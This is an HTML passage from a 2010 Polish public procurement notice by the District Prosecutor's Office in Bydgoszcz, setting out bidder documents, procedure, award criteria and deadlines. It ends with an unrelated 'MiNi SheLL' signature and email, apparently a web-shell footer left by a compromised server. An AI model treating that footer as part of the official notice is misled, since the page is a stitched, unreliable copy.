<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Na ofertę składają się następujące dokumenty:
Formularz ofertowo - cenowy przygotowany zgodnie ze wzorem podanym w  
załączniku numer 1 do SIWZ (wszystkie ceny w formularzu powinny być poddane  w złotych  polskich, powiększone o należny podatek VAT).
Oświadczenia, podpisane przez Osoby Uprawnione, w których Wykonawca 
potwierdza, że wypełnia warunki udziału w postępowaniu o udzielenie  
Zamówienia.
Oświadczenie o braku podstaw do wykluczenia Wykonawcy - załącznik numer 3 do SIWZ.
Oświadczenie, w którym Wykonawca potwierdza, że jest związany ofertą przez okres 30 dni od dnia, w którym upływa termin składania ofert - załącznik numer 4 do SIWZ.
Podpisane przez Osoby Uprawnione oświadczenie dotyczące Uzupełnionego 
Wzoru Umowy - załącznik numer 5 do SIWZ.
Pozostałe załączniki do SIWZ oraz załączniki w postaci dokumentów wskazanych w punkcie 5.1 SIWZ.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i są dopuszczalne  tylko w następujących przypadkach:
a. w przypadku zmiany stawki podatku VAT na przedmiot umowy - bez zmian pozostaje stawka netto za wykonywanie usługi, natomiast od dnia wejścia w życie nowej stawki podatku VAT, stosuje się stawkę nową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bydgoszcz.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Bydgoszczy, ul. Okrzei 10; 85 - 317 Bydgoszcz, pokój 110, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2010 godzina 10:00, miejsce: Prokuratura Okręgowa w Bydgoszczy, ul. Okrzei 10; 85 - 317 Bydgoszcz, pokój 110, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com